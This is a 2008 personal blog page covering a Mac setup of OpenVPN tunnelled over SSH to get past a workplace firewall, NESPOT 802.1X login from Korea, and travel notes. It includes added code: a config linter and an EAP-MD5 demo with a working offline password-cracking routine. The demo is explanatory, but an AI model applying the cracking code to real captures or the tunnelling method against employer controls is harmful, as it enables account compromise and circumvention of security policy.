
random noises emanating from the boston area

Entourage 2008 can’t see emails with a plus (“+”) in the subject.

Sunday 19 October 2008 - Filed under Software

Many people that use Macs need to use Entourage because their company utilizes Microsoft Exchange. That’s fine with me, as Exchange seems to be a perfectly functional (when someone else is running it) calendaring/email/addressbook “enterprise” thing. Plus, Mail.app is such a frustratingly bad piece of software. But this (probable) bug in Entourage is really silly.

Try sending yourself an email with the plus sign, “+” in the subject. Outlook can see it. Webmail can see it, but Entourage has no friggin’ idea it is there. The receipt of the mail triggers the sync of the inbox, but nothing shows up! What the hell?

Now, to find where the heck the bug submission button is…

1 comment  ::  2008-10-19  ::  mark

First iPhone post

Thursday 24 July 2008 - Filed under General

Okay, really just my iPod touch. But still, I’m sure this is the 10,000th “from my iPhone” post on the Internet. So be it, it’s still kinda neat.

Holy crap. This is my 100th post. Wow.

2008-07-24  ::  mark

Mac OS X + OpenVPN bridge + SSH Tunnel = VPN goodness

Sunday 20 July 2008 - Filed under Internet + Software

Ah, the beauty of open source software. This is a long post that started with a simple problem. At work, we live behind the Great Olin Firewall (GOF). I checked out some code from an internal Subversion repository over HTTP. Now, I’m outside the GOF and I want to commit some important changes. We have an SSH gateway, and SSH has a built-in SOCKS5 proxy. Cool, that should work, right? Nope. While you can use tsocks or proxychains, or some other transparent proxy service to get most of the way there, it isn’t the whole thing. I learned a lot from this page, but proxychains doesn’t compile well on OS X. Ugh. And tsocks doesn’t tunnel DNS requests on OS X.

Now, the GOF is a Nortel box that layers a custom hash of the username on top of an otherwise standards-based IPsec VPN. Boo. That means it won’t work with any third-party VPN client; you have to use the Contivity piece of garbage. Bonus: this piece of garbage is written by Apani and is no longer actively supported. Double ugh. So here is what I need:

  • VPN access to the work network
  • Tunneled through SSH
  • Ability to redirect DNS lookups through the VPN
  • Free, as in speech

What you’ll need to do this:

  • Root on a linux server inside the firewall
  • Mac on the outside

There, not so hard? Thankfully, the Intarwebs and a little hacking last night delivered the goods. In short, I used OpenVPN, a few scripts, and a little luck. Here’s how.

Server

  1. I used Ubuntu Dapper inside a Xen virtual machine. Worked great.
  2. apt-get install openvpn openssl bridge-utils
  3. cp -R /usr/share/doc/openvpn/examples/easy-rsa /etc/openvpn
  4. Follow the directions for generating keys at the OpenVPN HOWTO
  5. Copy the keys to the right places, as from the above HOWTO. I put my keys in /etc/openvpn/keys
  6. Use the following configuration file for your server and save it as /etc/openvpn/bridge.conf, the name it is started by below. This assumes an ethernet bridge will be built (later) and that you have a DHCP server somewhere on the LAN to give out IP addresses to VPN clients

    # /etc/openvpn/bridge.conf.  TCP because the SSH port-forward used later
    # only carries TCP; tap0 because the server side is an Ethernet bridge.
    proto tcp-server
    dev tap0
    ca /etc/openvpn/keys/ca.crt
    cert /etc/openvpn/keys/server.crt
    key /etc/openvpn/keys/server.key
    # A 1024-bit DH group was normal in 2008 but is too small today; generate
    # dh2048.pem or larger if you reproduce this.
    dh /etc/openvpn/keys/dh1024.pem
    # No "server" directive: clients get addresses from the LAN DHCP server
    # through the bridge.
    mode server
    tls-server
    client-to-client
    keepalive 10 120
    # Blowfish has a 64-bit block and current OpenVPN releases refuse it; use
    # AES-256-GCM.  comp-lzo is likewise discouraged now (compression oracle).
    cipher BF-CBC
    comp-lzo
    persist-key
    persist-tun
    status openvpn-status.log
    verb 3
  7. Create the ethernet bridge Debian-style by adding the following lines to your /etc/network/interfaces:

    auto br0
    iface br0 inet dhcp
    pre-up openvpn --mktun --dev tap0
    bridge_ports eth0 tap0
  8. Restart networking with sudo /etc/init.d/networking restart (the init script is called networking, not network, on Debian and Ubuntu)
  9. Now you should still have internet connectivity, and eth0 and a br0 bridge

Client

  1. Get and install OpenVPN 2.x. I used Macports, so I just fired up ports like: sudo port install openvpn2
  2. Grab and install the tun/tap driver for Mac OS X
  3. Reboot, or force install the kernel extensions
  4. Make sure you have the client encryption keys from above, and use the following client configuration:
    # client.conf.  "remote localhost" because the SSH port-forward set up
    # below presents the server's port 1194 on this machine.
    client
    dev tap
    proto tcp-client
    remote localhost
    tls-client
    # Consider adding "remote-cert-tls server" ("ns-cert-type server" on 2.0)
    # so that another user's client certificate cannot pose as the server.
    ca /opt/local/etc/openvpn/keys/ca.crt
    cert /opt/local/etc/openvpn/keys/mchang.crt
    key /opt/local/etc/openvpn/keys/mchang.key
    # Must match the server's cipher and compression settings.
    cipher BF-CBC
    comp-lzo
    nobind
    persist-key
    persist-tun
    # One script for both hooks; it puts tap0 into DHCP mode and sets the DNS keys.
    up /opt/local/etc/openvpn/tap-up-down.sh
    down /opt/local/etc/openvpn/tap-up-down.sh
    verb 3
  5. Grab the openvpn-tap-up-down.sh script from the bottom half of this mailing list posting, or download it right here: tap-up-down.sh
  6. Install that tap-up-down.sh in /opt/local/etc/openvpn and chmod +x it so it can be executed

Fire it up

Now we’re ready to start this thing up, over an SSH tunnel, kind of like described in this post.

  1. Fire up your ssh, tunneling the OpenVPN port like
    ssh -L 1194:vpn.your.domain.com:1194 ssh-gateway.your.company.com
    where ssh-gateway.your.company.com is your SSH gateway and vpn.your.domain.com is the VPN server you just set up, as that gateway sees it. The forwarded port listens on localhost only, which is why the client configuration says remote localhost. Don’t expect push redirect-gateway to work over this arrangement: OpenVPN’s peer is localhost, so the SSH session that carries the tunnel would itself be routed into the VPN unless you first add a host route for the SSH gateway via your physical interface.
  2. Turn on OpenVPN on the server like
    sudo openvpn --config /etc/openvpn/bridge.conf
  3. Turn on OpenVPN on the client like
    sudo openvpn2 --config /opt/local/etc/openvpn/client.conf
  4. You should see, on both sides, OpenVPN authenticating and then starting up.
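The server and client configurations above are faithful to 2008 practice, but a reviewer would flag several of their choices against a current OpenVPN release. The following linter is an added example, not code from the original post or from OpenVPN: it parses the two configurations (copied above with shortened file names), reports the weak settings, and shows hardened variants that come back clean. The check list, the remedies and the ta.key file name for a tls-crypt pre-shared key are this example’s own assumptions.

```python
"""Lint the OpenVPN server/client configs above for choices a reviewer
would flag today.

Added example; not code from the original post or from OpenVPN.  The two
2008 configs are the post's own; the hardened variants, the check list
and the remedies are this example's assumptions about current practice.
"""
from typing import Dict, List

# 64-bit block ciphers (SWEET32) and null encryption.  OpenVPN 2.5 stopped
# negotiating BF-CBC by default and 2.6 rejects it unless explicitly allowed.
WEAK_CIPHERS = {"BF-CBC", "DES-CBC", "DES-EDE3-CBC", "RC2-CBC", "CAST5-CBC", "NONE"}


def parse(text: str) -> Dict[str, List[List[str]]]:
    """Map directive -> list of argument lists; blanks and #/; comments dropped.
    Inline <ca>...</ca> blocks are not handled; the post uses file paths."""
    seen: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if line:
            name, *args = line.split()
            seen.setdefault(name, []).append(args)
    return seen


def lint(text: str, role: str) -> List[str]:
    """Return findings for one config; role is 'server' or 'client'."""
    seen = parse(text)
    findings: List[str] = []

    # Data-channel cipher; BF-CBC was the implicit default when absent.
    cipher = seen["cipher"][0][0] if "cipher" in seen else "BF-CBC"
    if cipher.upper() in WEAK_CIPHERS:
        findings.append(f"cipher {cipher}: 64-bit block cipher, use AES-256-GCM")

    # Compressing a tunnel that carries attacker-influenced plaintext is a
    # compression oracle (VORACLE); current releases warn unless it is off.
    if "comp-lzo" in seen or "compress" in seen:
        findings.append("comp-lzo/compress: compression oracle, remove it")

    # Packet HMAC defaults to SHA1 when 'auth' is absent.
    if "auth" not in seen:
        findings.append("no auth directive: HMAC defaults to SHA1, set auth SHA256")

    # Without a pre-shared control-channel key, anything that can reach the
    # port gets to talk to the TLS stack before authenticating.
    if "tls-auth" not in seen and "tls-crypt" not in seen:
        findings.append("no tls-auth/tls-crypt: control channel unprotected before TLS")

    if role == "server":
        dh = seen.get("dh", [[""]])[0][0]
        if "1024" in dh:  # only the file name is visible, so this is a heuristic
            findings.append(f"dh {dh}: 1024-bit group, use 2048 bits or more")
        if "client-to-client" in seen:
            findings.append("client-to-client: inter-client traffic is switched inside "
                            "OpenVPN and never crosses tap0/br0, so no firewall sees it")
    elif "remote-cert-tls" not in seen and "ns-cert-type" not in seen:
        # Any certificate the CA ever issued, including another user's client
        # cert, is otherwise accepted as the server: a rogue peer can MITM.
        findings.append("no remote-cert-tls server: client accepts any CA-issued cert as server")
    return findings


# The post's configs, with file names shortened.
SERVER_CONF_2008 = """
proto tcp-server
dev tap0
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
mode server
tls-server
client-to-client
keepalive 10 120
cipher BF-CBC
comp-lzo
persist-key
persist-tun
status openvpn-status.log
verb 3
"""

CLIENT_CONF_2008 = """
client
dev tap
proto tcp-client
remote localhost
tls-client
ca ca.crt
cert mchang.crt
key mchang.key
cipher BF-CBC
comp-lzo
nobind
persist-key
persist-tun
verb 3
"""

# Hardened variants (assumed); ta.key would come from 'openvpn --genkey'.
SERVER_CONF_HARDENED = SERVER_CONF_2008.replace("dh dh1024.pem", "dh dh2048.pem") \
    .replace("cipher BF-CBC", "cipher AES-256-GCM\nauth SHA256\ntls-crypt ta.key") \
    .replace("comp-lzo\n", "").replace("client-to-client\n", "")
CLIENT_CONF_HARDENED = CLIENT_CONF_2008.replace(
    "cipher BF-CBC", "cipher AES-256-GCM\nauth SHA256\ntls-crypt ta.key\nremote-cert-tls server"
).replace("comp-lzo\n", "")

if __name__ == "__main__":
    for role, conf in (("server", SERVER_CONF_2008), ("client", CLIENT_CONF_2008)):
        print(role, lint(conf, role))
```

Running it lists six findings for the server file and five for the client file; the hardened strings produce none. The dh check looks only at the file name, so a dh1024.pem renamed to something else would slip through; the other checks are exact directive matches.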

Now, you should be able to ping any machine on the remote subnet. I wanted to be able to get to anything on the internal network through the VPN, so I manually added a route to all of the internal network (10.0.0.0/8) through the VPN server’s default gateway, which is on-link through the bridge. Like this:

sudo route add -net 10.0.0.0/8 10.49.27.1

Of course, substitute the IP of the VPN server’s gateway to the rest of the network for 10.49.27.1. That, combined with the handy script from Ben Low, allows all DNS lookups for the internal network to go to the internal DNS servers, routed through the VPN.

Some notes:

  1. On the server side, everything is pretty much normal. I can’t seem to use the “push redirect-gateway” through this system, as a) either the OS X port of OpenVPN doesn’t support it (unlikely), or b) the gateway information is a little borked as it is going over an SSH tunnel. Either way, I just manually add the route to the default gateway.
  2. For some reason, the tap0 driver does not go into DHCP mode by default. You have to force it using the ipconfig program, which is done for you in the tap-up-down.sh script.
  3. On the client side, Mac OS X has a very complex name resolution service. Very cool if you get under the hood, as seen in these two threads on the Apple developer mailing list. The end result is that when you get the DHCP lease from the internal LAN DHCP server, the tap0 device gets some service keys that record the DNS servers pushed from the LAN DHCP server. After the tap0 driver comes up through OpenVPN, you can see this by running scutil from the command line, and executing
    get State:/Network/Service/DHCP-tap0
    d.show
  4. Now, OS X needs to have a SupplementalMatchDomains key associated with these DNS entries before it will actually consult them as part of the name resolution service. The script does that for you. You can see its effects after the VPN starts up by running scutil --dns

There you go. Now poke holes in your own Great Corporate Firewall!

1 comment  ::  2008-07-20  ::  mark

Public Wi-Fi in Korea and a Macintosh

Sunday 20 July 2008 - Filed under Internet

No one in Korea uses a Macintosh. Thus, it makes perfect sense that they would not support Mac OS X in any web applications or public services, such as city-wide wireless. One such provider is Korea Telecom’s NESPOT service. This is the nearly-ubiquitous blanket of wireless that covers much of Seoul. From universities to Starbucks to hotels, it’s everywhere. And it only works on Windows. It also serves homes with wired and wireless internet access.

As it turns out, it is a very standards-based system that uses RADIUS authentication. The key to finding that out was this IEEE conference publication from World of Wireless, Mobile and Multimedia Networks, 2006. Even from the abstract one can see that NESPOT uses 802.1X authentication. In fact, if you read the article, they use this system to authenticate millions of users using very little processing power. It is probably the largest installation of 802.1X authentication in the world, or so they claim.

(Yes, you can register your MAC address with them and then you don’t need to authenticate. But then you’d have to be able to read Korean to click through the menus, and I can’t.)

Since Mac OS X 10.3 (Panther), OS X has had 802.1X support built in to the networking subsystem. All you have to do is enable MD5 authentication, enter your username and password, and blam, you are rocking. The steps, with screenshots from 10.5 (Leopard), are below:

  1. Turn on Airport
  2. Make sure you can connect to the SSID “NESPOT”. You will get an IP address, but you won’t be able to get anywhere but the NESPOT main page.
  3. Open System Preferences > Network
  4. Choose Airport, then click Advanced…
  5. Choose the 802.1x tab
  6. Click the “+” and create a new User Profile
  7. Enter your username and password
  8. Choose “NESPOT” for the Wireless Network
  9. Make sure to check the “MD5” box in Authentication. I left TTLS and PEAP checked. I don’t know if these are necessary.
  10. Click OK
  11. Now choose the “AirPort” tab
  12. Double click on “NESPOT”
  13. Change the Security pulldown to 802.1X WEP
  14. Select the “NESPOT” user profile from the 802.1X pulldown
  15. Click Add on this dialog
  16. Click OK to close out the Advanced… dialog
  17. Then click Apply to apply your changes to the Network
  18. Now, the Airport status should say Connected, and under that, it should say something like Authenticated via MD5.
  19. If that doesn’t happen, turn off your Airport and turn it on again. You might have to go back into the Advanced… menu and edit Airport settings like from #11-#17. For some reason, my Mac forgets this security setting.
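What the “MD5” box in step 9 actually negotiates is EAP-MD5 (RFC 3748 section 5.4): the authenticator sends a random challenge and the laptop answers with MD5(Identifier || password || challenge). The script below is an added example, not code from the original post or from any real supplicant or RADIUS server. It builds both sides’ packets and then does what anyone within radio range can do, since MD5-Challenge neither authenticates the network nor derives keys that would protect the link: it takes one captured Request/Response pair and tests candidate passwords offline. The identity, password, challenge and word list are constructed for the demo.

```python
"""EAP-MD5 (RFC 3748 section 5.4), the "MD5" authentication chosen in step 9.

Added example; not code from the original post or from any real supplicant
or RADIUS server.  Identity, password, challenge and word list are constructed.
"""
import hashlib
import os
from typing import Dict, Iterable, Optional, Tuple

EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_MD5 = 4  # MD5-Challenge


def md5_response_value(identifier: int, password: bytes, challenge: bytes) -> bytes:
    """RFC 3748 5.4: MD5 over Identifier || secret || challenge (as in CHAP)."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


def build_eap(code: int, identifier: int, value: bytes, name: bytes) -> bytes:
    """Encode an MD5-Challenge packet:
    Code(1) Identifier(1) Length(2) Type(1) Value-Size(1) Value Name."""
    body = bytes([EAP_TYPE_MD5, len(value)]) + value + name
    return bytes([code, identifier]) + (4 + len(body)).to_bytes(2, "big") + body


def parse_eap(pkt: bytes) -> Tuple[int, int, bytes, bytes]:
    """Decode a packet into (code, identifier, value, name); rejects other types."""
    code, identifier = pkt[0], pkt[1]
    length = int.from_bytes(pkt[2:4], "big")
    if length != len(pkt) or length < 6 or pkt[4] != EAP_TYPE_MD5:
        raise ValueError("not a well-formed EAP MD5-Challenge packet")
    size = pkt[5]
    return code, identifier, pkt[6:6 + size], pkt[6 + size:length]


def authenticator_request(identifier: int, challenge: bytes, name: bytes) -> bytes:
    """Access point / RADIUS side: send a fresh random challenge."""
    return build_eap(EAP_REQUEST, identifier, challenge, name)


def supplicant_response(request: bytes, identity: bytes, password: bytes) -> bytes:
    """Laptop side: hash the password against the challenge, send it with the identity."""
    code, identifier, challenge, _ = parse_eap(request)
    if code != EAP_REQUEST:
        raise ValueError("expected an EAP Request")
    value = md5_response_value(identifier, password, challenge)
    return build_eap(EAP_RESPONSE, identifier, value, identity)


def authenticator_verify(request: bytes, response: bytes, passwords: Dict[bytes, bytes]) -> bool:
    """RADIUS side: recompute the hash from the stored cleartext password."""
    _, req_id, challenge, _ = parse_eap(request)
    code, resp_id, value, identity = parse_eap(response)
    if code != EAP_RESPONSE or resp_id != req_id or identity not in passwords:
        return False
    return value == md5_response_value(req_id, passwords[identity], challenge)


def offline_dictionary_attack(request: bytes, response: bytes,
                              wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Eavesdropper side: everything needed is in the two captured frames.

    No further contact with the network is needed, and because nothing in the
    exchange authenticates the authenticator, a rogue AP could have issued the
    request itself.  EAP-MD5 also derives no keys, so the data frames that
    follow are not protected by this login either.
    """
    _, identifier, challenge, _ = parse_eap(request)
    _, _, captured, _ = parse_eap(response)
    for guess in wordlist:
        if md5_response_value(identifier, guess, challenge) == captured:
            return guess
    return None


def demo() -> Optional[bytes]:
    """Run one exchange, verify it, then crack it from the captured frames."""
    identity, password = b"user@nespot", b"seoul2008"               # constructed
    request = authenticator_request(7, os.urandom(16), b"KT-NESPOT")
    response = supplicant_response(request, identity, password)
    if not authenticator_verify(request, response, {identity: password}):
        raise RuntimeError("legitimate login failed")
    wordlist = [b"password", b"nespot", b"seoul2007", b"seoul2008"]  # constructed
    return offline_dictionary_attack(request, response, wordlist)


if __name__ == "__main__":
    print("recovered password:", demo())
```

The same cracking loop works on a real capture: the identifier and challenge come from the EAP-Request frame, the 16-byte value from the EAP-Response, and each guess costs one MD5. This is why EAP-MD5 is fine for the wired, switch-port use it was designed for but a poor fit for an open wireless network, and why the method leaves the radio link unencrypted.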

Enjoy.

2008-07-20  ::  mark

Random thoughts from Korea

Sunday 20 July 2008 - Filed under Travel

I’ve been here for about a month, working, living, and generally absorbing as much of Korea as I can. Here are a few random observations that I’ve noted. And yes, they generalize a lot about an entire culture. Think of it as an outsider’s snapshot of Korea.

  • Smoking seems to be more prevalent here than in the United States. It is not uncommon to see dozens of people outside of each university building smoking in between classes and during lunch.
  • People walk slowly. Even compared to Iowa. I attribute this to the large Confucian influence, where not being in a hurry is valued. I dig it, because it is hot here, and I can walk really slowly and not break out in a pouring sweat.
  • Koreans love fried chicken. Okay, this is very over-generalizing, but I mean it in the nicest way since I freaking love fried chicken. Koreans make the most wonderful, delicious, succulent fried chicken. It is not to be confused with southern fried chicken in the United States, and I wouldn’t make them compete against each other. Rather, I’d have a big bucket of each and just enjoy. For more, check out this New York Times article about importing Korean-style fried chicken to New York City. Mmmm… one thing I will really miss about this place.
  • Parking is surprisingly cheap for such a crowded city. Well, at least compared to the Boston area.
  • Korean traffic is slow. In two ways, actually. The speed limits are low, and the traffic is thick. Think of it as the central downtown area of any big city (NYC, Boston, Chicago), except spread out over a larger area. When I drive in to work from the suburbs (say, like Natick to Boston), it is about 11-12 on-road miles. It can take anywhere from 30-90 minutes. The speed limit is at most 70kph in places, but one rarely gets going that fast. The drivers are not very aggressive, and they all seem to reliably signal their intentions, but it is crowded. You really have to pay attention, as lanes appear and disappear constantly, with the only indication being arrows painted in the lanes.
  • The arrows painted on the streets are all done in the same font. Cool.
  • Koreans don’t use Google. They use Daum.net or Naver.com.
  • http://maps.naver.com must have some sort of geolocating via IP address going on because when you open it in your browser, it centers on your current location pretty reliably. I’ve tested this at home, at the Ramada Hotel, and at Yonsei and Ewha Universities. Very cool, and super useful.
  • Koreans must have the ability to take in more sensory input than I can. I find everything a little overwhelming. They have tons of bright lights on every building. People are constantly shouting at you at the grocery store to buy their stuff. They even use amplification on the weekends. The music in the department stores is blaring. Their web pages have so much going on on them it is crazy. (The simplistic Web 2.0-y U.S. style has just not caught on here, with the big, simple, shiny buttons and very little text.) It is all a bit much for this midwesterner. Check out any Korean web page and you’ll see what I’m talking about.
  • On that topic, I went to the aquarium yesterday. For one of their underwater shows, they had a crowd of people assembled in front of a tank, all crammed into the area twice as large as a large living room. In the U.S., the announcers/guides would have either just shouted, or had very little local amplification. Not here. The sound was seriously loud. And it didn’t seem to bother anyone but me. Ouch.
  • No one uses a Macintosh here. But, they still remain “cool” enough to use as props for high-end commercials where people are acting like architects and stuff. Go figure.

Okay, enough for now. This is probably only interesting to me, and even that is suspect.

2008-07-20  ::  mark